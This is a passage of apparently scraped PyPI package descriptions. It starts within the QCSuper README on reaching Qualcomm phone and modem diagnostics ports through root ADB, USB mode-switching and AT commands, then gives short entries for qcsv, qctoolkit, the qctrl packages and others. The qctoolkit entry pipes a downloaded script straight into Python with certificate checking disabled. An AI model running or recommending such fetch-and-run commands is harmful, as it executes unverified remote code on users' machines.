Linux 4.9 or earlier MSM kernel, when using the--adbflag, QCSuper willtry to connect through ADB automatically, will then attempt to transfer an executable utility connecting to the/dev/diagdevice, in order to launch it as root using a command such assu -c /data/local/tmp/adb_bridge, and subsequentlytransmit the diagnostics data with the device over TCP(also forwarding the corresponing TCP port through ADB).On the devicesbearing a Linux 4.14 or later MSM kernel, when using 
the--adbflag, QCSuper will try to connect through ADB automatically, will then attempt tomode-switch the USB portof the phone using a command such assu -c 'setprop sys.usb.config diag,adb', and then execute theequivalent of the--usb-modem autoflag(see below).The--usb-modem flag allows QCSuper toconnect to the Qualcomm diagnostics port over a pseudo-serial port over USB, independently from ADB, which is the most common way to connect to the Qualcomm diag protocol of an Android-based phone using an external device.In order to use--usb-modem flag, the Qualcomm diagnostic port must be enabled on the corresponding phone, otherwise saidthe phone should have been USB mode-switchedbeforehand.The most common way to USB mode-switch your device is to execute a command such assetprop sys.usb.config diag,adbas root, but there may be other ways (with certain phone vendors) to enable the Qualcomm diagnostics-over-USB mode, see for examplethis pagefor possible ways, for certain devices, to enable Diag without root - it often imples to type a magic combination of digits over the phone's dialer keypad.In other devices, it may also be possible to use an APK file signed by the phone vendor and with System-related permissions in order to enable the Diag mode without rooting (search about thecom.longcheertel.midtestAPK for Xiaomi-based devices for example).Once your device has been correctly most-switched, running thegetprop sys.usb.configcommand over ADB should display a text string containingdiag.On the side of your computer, then, runninglsusb(on Linux) should display a line referring your device, for example:Bus 001 Device 076: ID 05c6:9091 Qualcomm, Inc. Intex Aqua Fish & Jolla C Diagnostic ModeNote the001:076(bus index/device index identifier), and the05c6:9091(vendor ID/product ID) information present in this output.Once you have this information available,you may try to use a flag such as--usb-modem 05c6:9091or--usb-modem 001:076with QCSuper (please respect the digit padding).If this isn't conclusive, you may use thelsusb -v -d 05c6:9091command, which should produce detailed output, including the USB configurations, interfaces and endpoints for the corresponding USB device:Bus 001 Device 027: ID 05c6:9091 Qualcomm, Inc. Intex Aqua Fish & Jolla C Diagnostic Mode\nDevice Descriptor:\n bLength 18\n bDescriptorType 1\n bcdUSB 2.01\n bDeviceClass 0 \n bDeviceSubClass 0 \n bDeviceProtocol 0 \n bMaxPacketSize0 64\n idVendor 0x05c6 Qualcomm, Inc.\n idProduct 0x9091 Intex Aqua Fish & Jolla C Diagnostic Mode\n bcdDevice 5.04\n iManufacturer 1 Xiaomi\n iProduct 2 Mi 11\n iSerial 3 d94f4341\n bNumConfigurations 1\n Configuration Descriptor:\n bLength 9\n bDescriptorType 2\n wTotalLength 0x0086\n bNumInterfaces 4\n bConfigurationValue 1\n iConfiguration 4 Default composition\n bmAttributes 0x80\n (Bus Powered)\n MaxPower 500mA\n Interface Descriptor:\n bLength 9\n bDescriptorType 4\n bInterfaceNumber 0\n bAlternateSetting 0\n bNumEndpoints 2\n bInterfaceClass 255 Vendor Specific Class\n bInterfaceSubClass 255 Vendor Specific Subclass\n bInterfaceProtocol 48 \n iInterface 0 \n[...]QCSuper allows you to manually select the identifiers of the configuration and the interface you are wishing to attempt to connect to on the concerned device (designated asbConfigurationValueandbInterfaceNumberin the raw USB descriptor), in the case where it isn't detected correctly. 
For example, the --usb-modem 05c6:9091:1:0 flag will select respectively configuration 1 and interface 0 on the concerned device; --usb-modem 05c6:9091:1:4 will select interface 4 on configuration 1. If the configuration and interface indexes are not specified, it will select the first interface descriptor on the system USB bus which is found to match the following criteria, by order of preference:

- bInterfaceClass=255/bInterfaceSubClass=255/bInterfaceProtocol=48/bNumEndpoints=2
- bInterfaceClass=255/bInterfaceSubClass=255/bInterfaceProtocol=255/bNumEndpoints=2

When using the --usb-modem auto flag, the first device exposing a USB interface compliant with these criteria is picked, and if needed on Linux the underlying /dev/ttyUSB* (usbserial module) or /dev/ttyHS* (hso module) character device is selected, in the case where the device has been detected and mounted by a kernel module (see the "Using QCSuper with an USB modem" section below).

Alternately, on Linux, it may also be possible to manually create /dev/ttyUSB* endpoints corresponding to the interfaces of a given USB device, which you will then be able to connect to using QCSuper with a flag such as --usb-modem /dev/ttyUSB0 (this may require running QCSuper with root rights), using the usbserial module. For this, you can use a command such as:

sudo rmmod usbserial
sudo modprobe usbserial vendor=0x05c6 product=0x9091

Using QCSuper with an USB modem

You can use QCSuper with a USB modem exposing a Diag port using the --usb-modem option, whose argument is the name of the pseudo-serial device on Linux (such as /dev/ttyUSB0, /dev/ttyHS2 and other possibilities) or of the COM port on Windows (such as COM2, COM3).

Please note that in most setups, you will need to run QCSuper as root in order to be able to use this mode, notably for handling serial port interference.

If you don't know which devices under /dev expose the Diag port, you may have to try several of them. You can try to auto-detect it by stopping the ModemManager daemon (sudo systemctl stop ModemManager) and using the following command:

sudo ModemManager --debug 2>&1 | grep -i 'port is QCDM-capable'

then Ctrl-C.

Please note that if you're not able to use your device with, for example, ModemManager in the first place, it is likely that it is not fully set up and that it will not work with QCSuper either. A few possible gotchas are:

- You didn't apply the proper mode switching command for your device.
- If you bought a device that previously had a SIM from a different operator, your device may be SIM-locked. You may have to use the unlock code from the former operator and submit it to the device, as if it was a PIN code: sudo mmcli -i 0 --pin=
- If your Qualcomm-based USB device doesn't expose a Diag port by default, you may need to type the following through the AT port in order to enable the Diag port: AT$QCDMG

Please note that only one client may communicate with the Diag port at the same time. This applies to two QCSuper instances, or to QCSuper and ModemManager instances.

If ModemManager is active on your system, QCSuper will attempt to dynamically add a udev rule to prevent it from accessing the Diag port and restart its daemon, as it's currently the best way to achieve this.
It will suppress this rule when closed.Supported devicesQCSuper was successfully tested with:Sony Xperia Z (Phone) - 4G - works out of the box after rooting an enabling adbNexus 6P (Phone) - 4G - works out of the box after rooting an enabling adbZTE MF823 (USB Modem) - 4G - may require tomode-switch the device to CDC-WDM, set the device tofactory mode, then execute the AT command mentioned aboveZTE MF667 (USB Modem) - 3G, 2011 - should work out of the box (may require mode switching)Option Icon 225 (USB Modem) - 3G, 2008Novatel Ovation MC998D (USB Modem)ZTE WCDMA Technologies MSM MF110/MF627/MF636 (USB Modem)ZTE 403zt (USB Modem) - 4GOnePlus One and 3 (Phones)Andromax A16C3H (Phone)Samsung Galaxy S4 GT-I9505 (Phone)Is it however aiming to be compatible with the widest possible range of devices based on a Qualcomm chipset, for the capture part.Do no hesitate to report whether your device is successfully working or not through opening aGithub issue.Related tools using the Diag protocolThere are a few other open tools implementing bits of the Diag protocol, serving various purposes:ModemManager: the principal daemon enabling to use USB modems on Linux, implements bits of the Diag protocol (labelled as QCDM) in order to retrieve basic information about USB modem devices.SnoopSnitch(specificallygsm-parser): chiefly an Android application whose purpose is to detect potential attacks on the radio layer (IMSI catcher, fake BTS...). It also have a secondary feature to capture some signalling traffic to PCAP, which does not provide exactly the same thing as QCSuper (LTE traffic isn't encapsulated in GSMTAP for example, device support may be different).diag-parser: A Linux tool that derivates from the PCAP generation feature from SnoopSnitch, somewhat improved, designed to work with USB modems.MobileInsight: this Android application intends to parse all kinds of logs output by Qualcomm and Mediatek devices (not only those containing signalling information, but also proprietary debugging structures), and dumping these to a specific XML representation format. Does not provide user-facing PCAPs (but formerly used Wireshark as a backend for converting certain protocol information to XML).qcombbdbg: A debugger for the Qualcomm baseband setting up itself by hooking a Diag command, through using the Diag command that allows to write to memory, for the Option Icon 225 USB modem.OpenPST: A set of tools related to Qualcomm devices, including a GUI utility allowing, for example, to read data on the tiny embedded filesystem accessible through Diag (EFS).SCAT: A tool with similar GSMTAP generation abilities, taking as input a serial port, also supporting Samsung Exynos."} +{"package": "qcsv", "pacakge-description": "An API to read and analyze CSV files by inferring types for each column of\ndata.Currently, only int, float and string types are supported."} +{"package": "qc-syn", "pacakge-description": "Quantum Circuit Synthesis Environment for Reinforcement LearningThis project provides a quantum circuit synthesis environment for reinforcement learning. The environment is built on top of the Gymnasium framework.InstallationTo install the environment, you need to have Python and pip installed on your system. 
If you don't have them installed, you can download them from the official Python website.Once you have Python and pip installed, you can install the environment by running the following command in your terminal:pipinstallqc_synUsageTo create a new instance of the environment, you can use thegym.makefunction:importgymnasiumasgymimportqc_synenv=gym.make(\"qc_syn/QuantumCircuit-v0\",qubit_count=4)observation,info=env.reset()for_inrange(1000):action=env.action_space.sample()# agent policy that uses the observation and infoobservation,reward,terminated,truncated,info=env.step(action)ifterminatedortruncated:observation,info=env.reset()env.close()ContributingContributions are welcome! Please feel free to submit a pull request.LicenseThis project is licensed under the terms of the MIT license."} +{"package": "qcsys", "pacakge-description": "qcsysComing very soon!"} +{"package": "qct", "pacakge-description": "Qct Qt4/PyQt based commit toolPrimary goals:Cross-Platform (Linux, Windows-Native, MacOS)Be VCS agnosticGood keyboard navigation, keep the typical work-flow simpleUniversal change selectionCurrently supports Mercurial, Bazaar, CVS, and Monotone repositories."} +{"package": "qct-cuda-ops", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qctic", "pacakge-description": "QCTIC Qiskit ProviderA Qiskit provider based onQiskit Aerthat may be used to interact with the quantum simulation platformQCTIClocated atCTIC.Please check the/notebooksfolder for some introductory examples of usage."} +{"package": "qctma", "pacakge-description": "Injects material (Young\u2019s modulus) to each element, based on a Dicom stack, and gray level to Young\u2019smodulus relationships. Specifically designed to be used with Ansys .cdb meshes."} +{"package": "qctoolkit", "pacakge-description": "Python modules for quantum chemistry applications=====================================================qctoolkit is quantum chemistry tool kit.It meant to provide universal interface to ab initio codeto test ideas or to produce data reliably.The code includes Abinit, QuantumESPRESSO, Gaussian, NwChem,CPMD, BigDFT, ... etc.It also provide some basic molecule operations, includingrotation, stretching, alignment, bond identification, ... etc,and data formatting, includingxyz files, Gaussian CUBE files, V\\_SIM ascii files, pdb files, ... etc.It seems worthwile to put effort to rewrite my bash/perl/python/Ctools in to an integrated module or package. It should boosts thereusability, productivity, and reproducibility of my resultsgenerated during my PhD in Basel.More importantly, every results should be easily reproduced,examined, and especially furthre developed. This package starts ascollections of modules of format I/O, analysis, plots.Hopefully, these modules can one day become a package for generalpurpose chemistry tool kit.**Installation on Ubuntu 32/64 systems**:* __To install__: ```cd /path/to/qctoolkit && python setup.py install --user``` or install by pip using ```pip install qctoolkit --user```.* __Install on Amazon Ec2__: It is tested and working on amazon Ec2 ubuntu instances. 
For a fresh install, all dependencies must be installed:
```
sudo apt-get update && sudo apt-get install -y gcc g++ gfortran liblapack-dev liblapack-doc-man liblapack-doc liblapack-pic liblapack3 liblapack-test liblapacke liblapacke-dev libgsl0-dev libatlas-base-dev build-essential libffi6 libffi-dev libssl-dev libyaml-dev libpython2.7-dev python-pip python-dev freetype* python-matplotlib cython
```
Note that matplotlib and cython are installed through the ubuntu repository for convenience. It might be necessary to create temporary swap if the memory runs out:
```
sudo /bin/dd if=/dev/zero of=/var/swap.1 bs=1M count=1024
sudo /sbin/mkswap /var/swap.1
sudo /sbin/swapon /var/swap.1
```
Then do the pip install: ```pip install qctoolkit --user```
If temporary swap was added, remove it after installation:
```
sudo swapoff /var/swap.1
sudo rm /var/swap.1
```
* __To remove__: Manually remove all created files. The list of files can be obtained with the --record flag during install: ```python setup.py install --user --record fileList.txt```
* **Note** that the ```setup.py``` script depends on the python setuptools package. This can be installed by ```wget https://bootstrap.pypa.io/ez_setup.py --no-check-certificate -O - | python - --user``` with superuser privilege.
* The package depends on [NumPy > 1.11.0](http://www.numpy.org/), [SciPy > 0.16.0](https://www.scipy.org/), [pandas > 0.17.1](http://pandas.pydata.org/), and [matplotlib > 1.5.1](http://matplotlib.org/).
* **Note** that newer versions of many python modules are required. They must __NOT__ be installed via the ubuntu repository. When a module is installed through the ubuntu repository as a python-module (e.g. python-numpy), the import path of such a module **WILL GET** the highest priority. In other words, stable but out-dated versions will always get loaded. To circumvent this, the best solution is to use a virtual environment and set up the dependencies there. However, it is also possible to modify the system behaviour by editing the easy_install path ```/usr/local/lib/python2.7/dist-packages/easy-install.pth```. Simply commenting out the second line ```/usr/lib/python2.7/dist-packages``` suppresses the system from inserting this path before PYTHONPATH. However, for some systems this fix is still not working. In that case, one has to modify the default python behaviour of constructing the ```sys.path``` variable. It can be done by modifying ```/usr/lib/python2.7/site.py``` and adding the following two lines to the end of the file:
```
sys.path.remove('/usr/lib/python2.7/dist-packages')
sys.path.append('/usr/lib/python2.7/dist-packages')
```
* **Note** that all code is written with **2-space indentation**. To change it according to the pep8 standard, use the following command:
```cd /path/to/qctoolkit && find .
-name \"*.py\"|xargs -n 1 autopep8 --in-place```where ```autopep8``` can be installed simply via ```pip install autopep8 --user```**Dependent Python packages**:* numpy 1.11.0* scipy 0.16.0* pandas 0.17.1* matplotlib 1.5.1* matplotlib.pyplot* PyYAML 3.11* cython* psutil* networkx* periodictable* mdtraj* paramiko (newest version might be problematic, 1.17 works fine)* And standard libraries: sys, re, os, glob, math, subprocess, multiprocessing, copy, collections, compiler.ast, shutil, fileinput, operator, inspect, xml.etree.ElementTree* pymol is also used for visualization* pyscf and horton is optional**Implemented interfaces to QM codes**:* Gaussian basis:- [Gaussian](www.gaussian.com/)- [NWChem](www.nwchem-sw.org/index.php/Main_Page)- [horton](theochem.github.io/horton/)- [pyscf](http://sunqm.github.io/pyscf/)* Plane wave basis:- [VASP](www.vasp.at)- [QuantumESPRESSO](www.quantum-espresso.org/)- [CPMD](www.cpmd.org/)- [Abinit](http://www.abinit.org/)* Wavelet basis:- [BigDFT](bigdft.org/Wiki/index.php?title=BigDFT_website)**Required libraries**:* OpenMP* openmpi* gsl(GNU Scientific Library)* LAPACK* libxc-3.0.0*20150702 KYSC*"} +{"package": "qctools", "pacakge-description": "qctoolsPython tools for quantum chemistsFeaturesDefine Event Handlers for straightforward parsing of Quantum Chemistry OutputExample:Read natoms from Gaussian Output file:1. Step: Define the EventThe number of atoms are written typically in the following way\nin the Gaussian output file:.Gaussian Log File...\nNAtoms= 3 NActive= 3 NUniq= 2 SFac= 2.25D+00 NAtFMM= 50 NAOKFM=F Big=F\nOne-electron integrals computed using PRISM.\n...the event should do the following:It should loop over all lines of the file, till it findes the\nKeywordNAtoms=It should return that line and extract the 2. element of that\nline as a stringThe corresponding event looks like:>>> NAtoms = Event('NAtoms',\n... 'grep', {'keyword': 'NAtoms=',\n... 'ilen': 1,\n... 'ishift': 0},\n... func='split',\n... func_kwargs={'idx': 1, 'typ': int}\n...)The first entry is the name of the event, and can be any name.\nThe second entry is the type of the event, in this case just grep.\nThe third entry gives the parameter to the corresponding event function:\n[we want to search for \u2018NAtoms=\u2019 and return a single line (ilen=1)\nnot shifted (ishift=0) from the keyword.]Afterwards the line is given to a postprocessing function (\u2018split\u2019) which\nsplits the line by spaces and returns the element[1] of the line as an integer.\nRemember, this is Python/C notation to element[1] is the second element in the list.For the Forces the event should look the following:-------------------------------------------------------------------\nCenter Atomic Forces (Hartrees/Bohr)\nNumber Number X Y Z\n-------------------------------------------------------------------\n 1 8 0.000000000 0.000000000 0.005485119\n 2 1 0.000000000 0.017353174 -0.002742559\n 3 1 0.000000000 -0.017353174 -0.002742559\n------------------------------------------------------------------>>> forces = Event('forces',\n... 'xgrep', {'keyword': 'Forces (Hartrees/Bohr)',\n... 'ilen': 'NAtoms',\n... 'ishift': 3},\n... func='split',\n... func_kwargs={'idx': [2, 3, 4], 'typ': [float, float, float]},\n... settings={'multi': False},\n...)2. Step: Add the new event to an existing Event Handler>>> GaussianReader.add_event(\"NAtoms\", NAtoms)\n>>> GaussianReader.add_event(\"forces\", forces)3. 
Step: Use the Event Handler to parse an file>>> gauout = GaussianReader(\"h2o.log\", [\"NAtoms\", \"forces\"])\n>>> gauout[\"NAtoms\"]\n3\n>>> gauout[\"forces\"]\n[[0.0,0.0,0.005485119],[0.0,0.017353174,-0.002742559],[0.0,-0.017353174,-0.002742559]]CreditsDevelopment LeadMaximilian MengerContributorsWhy not be the first?Thanks to:Boris MaryasinGustavo CardenasCreditsThis package was created withCookiecutterand theaudreyr/cookiecutter-pypackageproject template.History0.1.0 (2019-04-12)First release on PyPI."} +{"package": "qctrl", "pacakge-description": "\u26a0\ufe0f (DEPRECATED) This package has been deprecated \u26a0\ufe0fWe've created a new dedicated and improved Boulder Opal client,boulderopal. Support for the legacyqctrlclient ended on 2024-01-31. You can read theBoulder Opal get started guideorcontact usif you need assistance.Q-CTRLThe Q-CTRL Python package provides an intuitive and convenient Python interface\nto Q-CTRL's quantum control solutions for users of Boulder Opal. Boulder Opal\nis a versatile Python toolset that provides everything a research team needs to\nautomate and improve the performance of hardware for quantum computing and\nquantum sensing."} +{"package": "q-ctrl", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qctrl-admin-cli", "pacakge-description": "Q-CTRL Admin CLIThis is a utility which is intended for internal use."} +{"package": "qctrl-cirq", "pacakge-description": "Q-CTRL Python CirqThe aim of the Q-CTRL Cirq Adapter package is to provide export functions allowing\nusers to deploy established error-robust quantum control protocols from the\nopen literature and defined in Q-CTRL Open Controls on Google quantum devices\nand simulators.Anyone interested in quantum control is welcome to contribute to this project."} +{"package": "qctrl-client", "pacakge-description": "Q-CTRL Python ClientThe Q-CTRL Python Client package provides a Python client to access Q-CTRL's GraphQL API. It is used as a base for Q-CTRL's client-side product packages and for inter-service communication."} +{"package": "qctrl-commons", "pacakge-description": "Q-CTRL CommonsQ-CTRL Commons is a collection of common libraries for the Python language."} +{"package": "qctrl-core-workflow-manager", "pacakge-description": "Q-CTRL Core Workflow ManagerThis is a utility which is intended for internal use."} +{"package": "qctrl-experiment-scheduler", "pacakge-description": "Q-CTRL Experiment SchedulerThe Q-CTRL Experiment Scheduler package for Boulder Opal allows you to automate the workflow of complex calibration procedures. The scheduler will take into account the dependency between different parts of the calibration, the status of each of these parts, and the parameters that you are most interested in the calibration. With this information, it will determine the sequence that the calibrations have to be executed and run them for you.The Q-CTRL Experiment Scheduler was developed to be used with the quantum control software toolset Boulder Opal. 
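To make the idea of dependency-ordered calibration concrete, here is a generic sketch using only the Python standard library. It is not the Q-CTRL Experiment Scheduler API; the calibration names and the dependency graph below are made up for illustration.

from graphlib import TopologicalSorter

# Hypothetical calibration dependency graph: each key names a calibration step,
# and the associated set lists the steps it depends on.
calibration_graph = {
    'readout': set(),
    'pi_pulse_amplitude': {'readout'},
    'pi_pulse_frequency': {'readout'},
    'gate_fidelity': {'pi_pulse_amplitude', 'pi_pulse_frequency'},
}

def run_calibration(step):
    # Placeholder for running one calibration experiment and storing its result.
    print(f'Calibrating {step}')

# Execute the steps in an order that respects every dependency.
for step in TopologicalSorter(calibration_graph).static_order():
    run_calibration(step)

A real scheduler additionally tracks the status of each calibration and decides which parts need to be re-run; the sketch above only shows the dependency-ordering aspect.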
See how you canget started with Boulder Opaltoday."} +{"package": "qctrl-local-bundler", "pacakge-description": "Q-CTRL Local BundlerThis is a utility which is intended for internal use."} +{"package": "qctrl-logging-utils", "pacakge-description": "Q-CTRL Logging UtilsThis is a utility which is intended for internal use."} +{"package": "qctrl-mloop", "pacakge-description": "Q-CTRL M-LOOP AdapterThe Q-CTRL M-LOOP Adapter package allows you to integrate Boulder Opal automated closed-loop optimizers with automated closed-loop optimizations managed by the open-source package M-LOOP.See how you can use M-LOOP with Boulder Opal in the user guideHow to manage automated closed-loop hardware optimization with M-LOOP."} +{"package": "qctrl-nuitka", "pacakge-description": "Q-CTRL NuitkaThis is a utility which is intended for internal use."} +{"package": "qctrl-open-controls", "pacakge-description": "Q-CTRL Open ControlsQ-CTRL Open Controls is an open-source Python package that makes it easy to create and deploy established error-robust quantum control protocols from the open literature. The aim of the package is to be the most comprehensive library of published and tested quantum control techniques developed by the community, with easy to use export functions allowing users to deploy these controls on:Custom quantum hardwarePublicly available cloud quantum computersTheQ-CTRL product suiteAnyone interested in quantum control is welcome to contribute to this project."} +{"package": "qctrl-pyquil", "pacakge-description": "\u26a0\ufe0f (DEPRECATED) This package has been deprecated \u26a0\ufe0fVisithttps://docs.q-ctrl.comfor updated information about how to integrate Q-CTRL software with PyQuil."} +{"package": "qctrl-qiskit", "pacakge-description": "Q-CTRL Qiskit adapterThe aim of the Q-CTRL Qiskit Adapter package is to provide export functions allowing\nusers to deploy established error-robust quantum control protocols from the\nopen literature and defined in Q-CTRL Open Controls on IBM Quantum hardware.Anyone interested in quantum control is welcome to contribute to this project."} +{"package": "qctrl-qua", "pacakge-description": "Q-CTRL QUA AdapterThe Q-CTRL QUA Adapter package allows you to integrate Boulder Opal with the QUA quantum computing language.See how you can do that in the user guideHow to integrate Boulder Opal with QUA from Quantum Machines."} +{"package": "qctrl-release-noter", "pacakge-description": "Q-CTRL Release NoterThe Q-CTRL Release Noter Python package provides a command line tool that generates the recommended release notes for a GitHub package from Q-CTRL.InstallationInstall the Q-CTRL Release Noter with:pipinstallqctrl-release-noterUsageIn the repository whose release notes you want to generate, run:release_noterYou can also specify the path of the repository:release_noter/path/to/repositoryTo prefill the information on the GitHub release page, use:release_noter--github"} +{"package": "qctrl-service-utils", "pacakge-description": "Q-CTRL Service UtilsThis is a utility which is intended for internal use."} +{"package": "qctrl-sphinx-theme", "pacakge-description": "Q-CTRL Sphinx ThemeThe Q-CTRL Sphinx Theme is a very opinionatedSphinxtheme intended for use with publicQ-CTRL Documentationwebsites such as theQ-CTRL Python package.InstallationInstall the Q-CTRL Sphinx Theme package.pipinstallqctrl-sphinx-themeAddqctrl-sphinx-themeas a dev dependency in yourpyproject.tomlfile.Add the following to your project\u2019sconf.pyfile:html_theme=\"qctrl_sphinx_theme\"ConfigurationThe Q-CTRL 
Sphinx Theme requires no configuration and there is no need to set anyhtml_theme_optionsin your project\u2019sconf.pyfile. The theme will automatically set all necessary theme options and will update any theme option with an available environment variable if one exists."} +{"package": "qctrl-toolkit", "pacakge-description": "Q-CTRL ToolkitToolkit of convenience functions and classes for the Q-CTRL Python package."} +{"package": "qctrl-visualizer", "pacakge-description": "Q-CTRL VisualizerThe Q-CTRL Visualizer offers broad functionality to visually engage with quantum dynamics and quantum controls. These tools can help you develop understanding and intuition, and ultimately support the implementation of your quantum controls. See the topicVisualizing your data using the Q-CTRL Visualizerin the Q-CTRL documentation for more information.The Q-CTRL Visualizer is meant to be used with the Q-CTRL products Boulder Opal, Fire Opal, and Open Controls. See how you can get started withBoulder OpalandFire Opaltoday."} +{"package": "qctrl-workflow-client", "pacakge-description": "Q-CTRL Python Workflow ClientThe Q-CTRL Python Workflow Client package provides a Python client to access Q-CTRL's GraphQL API and the Workflow framework. It is used as a base for Q-CTRL's client-side product packages."} +{"package": "qcustomplot", "pacakge-description": "No description available on PyPI."} +{"package": "qcustomplot-pyside2", "pacakge-description": "Pyside2 bindings for QCustomplotThis project provides Python (v3.6 - v3.10) bindings for the popular OpenSourceQCustomPlot(v2.1.0) Qt (v5.15.2) plotting library.\nThe bindings are provided for Linux and Windows (64bit).The project can be found onGithub.InstallationYou can install the library and run the examples with the following commands.\nPreferably you should do this in a pythonvirtual environment.pip install qcustomplot_pyside2 # Install latest version of the library\nqcustomplot_examples # Start demos with default delay\nqcustomplot_examples 0 # Start demos without automatic continuation\nqcustomplot_examples 5000 # Continue demos every 5000 msExamplesThe folderqcustomplot_examples_pyside2contains the examples from the QCustomplot C++ webpage translated to Python.\nThese can be used as basis for own development or for seeing the features of the library.Running all examplesThe example commandqcustomplot_exampleslinking to the scriptall_demos.pyruns through all examples\nwith a default or user specified delay time.Install the matching python wheel from the wheels directory (preferably in a virtual environment).Start the shell script 'qcustomplot_examples' which will run all examplesSimple example codeimport shiboken2 as Shiboken\nfrom PySide2 import QtGui\nimport sys\nimport math\nfrom random import uniform,randint\nfrom PySide2.QtWidgets import QApplication, QDialog, QLineEdit, QPushButton, QVBoxLayout,QWidget,QMainWindow\nfrom PySide2.QtGui import QLinearGradient, QRadialGradient, QColor, QBrush, QPen, QFont, QPixmap, QPainterPath\nfrom PySide2.QtCore import Qt, QMargins,QPointF,QObject,QCoreApplication,QFile,QTimer,QLocale,QDateTime,QDate,QSize,QTime\nfrom PySide2.QtUiTools import QUiLoader\nfrom qcustomplot_pyside2 import *\n\ndef demo(app):\n # Create plot\n customPlot = QCustomPlot()\n customPlot.resize(800, 600)\n customPlot.setWindowTitle('Quadratic Demo')\n\n # generate some data:\n x = [0.0] * 101 # initialize with entries 0..100\n y = [0.0] * 101 \n for i in range(0, 101):\n x[i] = i/50.0 - 1 # x goes from -1 to 1\n y[i] = x[i]*x[i] # let's plot a 
quadratic function\n\n # create graph and assign data to it:\n customPlot.addGraph()\n customPlot.graph(0).setData(x, y)\n # give the axes some labels:\n customPlot.xAxis.setLabel(\"x\")\n customPlot.yAxis.setLabel(\"y\")\n # set axes ranges, so we see all data:\n customPlot.xAxis.setRange(-1, 1)\n customPlot.yAxis.setRange(0, 1)\n\n # show the plot\n customPlot.show()\n # run the main Qt loop\n res = app.exec_()\n # Make sure and manually reset pointer\n customPlot = None\n return res\n\n\nif __name__ == '__main__':\n # Create the Qt Application\n app = QApplication(sys.argv)\n res = demo(app)\n sys.exit(res)ScreenshotsSee the [Wiki] (https://github.com/SBGit-2019/Pyside-QCP/wiki) for some screenshots and explanations.\nAll screenshots can also be found in thefigures directory.VersionsThe version naming of the Python bindings is analogue to the naming of the QCustomPlot library.v2.0.1: QCustomPlot library 2.0.1: All basic featuresv2.1.0: QCustomPlot library 2.1.0: Experimental radial plots and more bindings.v2.1.1: Small bugfixesv2.1.2: Small bugfixes for Scatterplot with single pointsv2.1.4: Bugfix for zero line and issue #4v2.1.5: Allow python access to all public fields of QCP (issue #5)\n(Note: Access to QCPpublic fieldshas changed from methods, e.g. w.start() to fields, e.g. w.start, methods are available still as w.get_start())LicenseThis project is licensed under the GPLv3+ License - see theLICENSEfile for details.Additionally, you can also use these bindings / these python wheels in commercial projects:if you have a commercial license for QCustomPlot 2.xfullfill the Qt license requirements, which typically mean you are using only the LGPL features of Qt 5.x or have a commercial license of Qt 5.x (as the bindings link only dynamically to Qt)Note that commercial licenses are available for [QCustomPlot] athttps://www.qcustomplot.com/.AcknowledgmentsEmanuel Eichhammer author ofQCustomPlot[Qt] (https://www.qt.io/)"} +{"package": "qc-utils", "pacakge-description": "qc-utilsis a python package that providesQCMetricandQCMetricRecordclasses that can be used for representing ENCODE pipeline quality control metrics.Installation$pipinstallqc-utilsProject Informationqc-utilsis released under theMITlicense, documentation lives inreadthedocs, code is hosted ongithuband the releases onPyPI."} +{"package": "qcware", "pacakge-description": "Forge Client LibraryThis package contains functions for easily interfacing with Forge.InstallationTo install with pip:pipinstallqcwareTo install from source, you must first installpoetry.\nThen, execute the following:gitclonehttps://github.com/qcware/platform_client_library_python.gitcdplatform_client_library_pythonpoetrybuildcddistpipinstallqcware-7.0.0-py3-none-any.whlAPI KeyTo use the client library, you will need an API key. You can sign up for one athttps://forge.qcware.com.To access your API key, log in toForgeand navigate to the API page. Your API key should be plainly visible there.A Tiny ProgramThe following code snippet illustrates how you might run Forge client code locally. 
Please make sure that you have installed the client library and obtained an API key before running the Python code presented below.# configurationfromqcware.forge.configimportset_api_key,set_hostset_api_key('YOUR-API-KEY-HERE')set_host('https://api.forge.qcware.com')# specify the problem (for more details, see the \"Getting Started\" Jupyter notebook on Forge)fromqcware.forgeimportoptimizationfromqcware.typesimportPolynomialObjective,Constraints,BinaryProblemqubo={(0,0):1,(0,1):1,(1,1):1,(1,2):1,(2,2):-1}qubo_objective=PolynomialObjective(polynomial=qubo,num_variables=3,domain='boolean')# run a CPU-powered brute force solutionresults=optimization.brute_force_minimize(objective=qubo_objective,backend='qcware/cpu')print(results)If the client code has been properly installed and configured, the above code should display a result similar to the following:Objectivevalue:-1Solution:[0,0,1]For further guidance on running client code to solve machine learning problems, optimization problems, and more, please read through the documentation made available athttps://qcware.readthedocs.ioas well as the Jupyter notebooks made available onForge."} +{"package": "qcware-quasar", "pacakge-description": "QuasarBuild status:What is Quasar?Quasar is an abstract library for creating and evaluating quantum computing\ncircuits. It also can be a way of transforming those circuits to be run\nnatively on a variety of QC architectures.This public version of Quasar is used to create circuits\nthat can be evaluated on QC Ware'sForgeplatform, but also can do\nsome evaluations locally with a classical simulation backend."} +{"package": "qcware-transpile", "pacakge-description": "No description available on PyPI."} +{"package": "qd", "pacakge-description": "No description available on PyPI."} +{"package": "qdafile", "pacakge-description": "Qdafile is a Python library to read and write KaleidaGraph(tm) version 3.x\nQDA data files.KaleidaGraph is a registered trademark ofAbelbeck Software.Qdafile is no longer being actively developed.Author:Christoph GohlkeLicense:BSD 3-ClauseVersion:2022.9.28RequirementsThis release has been tested with the following requirements and dependencies\n(other versions may work):CPython 3.8.10, 3.9.13, 3.10.7, 3.11.0rc2NumPy 1.22.4Revisions2022.9.28Return headers as str, not bytes (breaking).Add type hints.Drop support for Python 3.7 and numpy < 1.19 (NEP29).2021.6.6Support os.PathLike file names.Remove support for Python 3.6 (NEP 29).2020.1.1Remove support for Python 2.7 and 3.5.Examples>>> from qdafile import QDAfile\n>>> QDAfile().write('_empty.qda')\n>>> QDAfile(\n... [[1.0, 2.0, 0.], [3.0, 4.0, 5.0], [6.0, 7.0, 0.]],\n... rows=[2, 3, '2'],\n... headers=['X', 'Y', 'Z'],\n... dtypes=['>f8', '>i4', '>f4'],\n... ).write('_test.qda')\n>>> qda = QDAfile('_test.qda')\n>>> print(qda)\n\n file id: 12\n columns: 3\n rows: [2, 3, 2]\n headers: ['X', 'Y', 'Z']\n dtypes: ['>f8', '>i4', '>f4']\n>>> qda.headers[2]\n'Z'\n>>> qda[2, :qda.rows[2]]\narray([6., 7.])"} +{"package": "qda-modelos", "pacakge-description": "This repository has the implementation and tests of benchmarked\nbio-optic models that evaluates some water quality indexes by analyzing\nsatellite images.Table of contentsGeneral InfoGetting StartedUsageTestingContributingLinksAuthors and ContributorsLicenseGeneral InfoIn attempt to analyze the water quality of reservoirs and lakes by\nremote sensing methods, such as satellites images, bio-optical models\nwere used. 
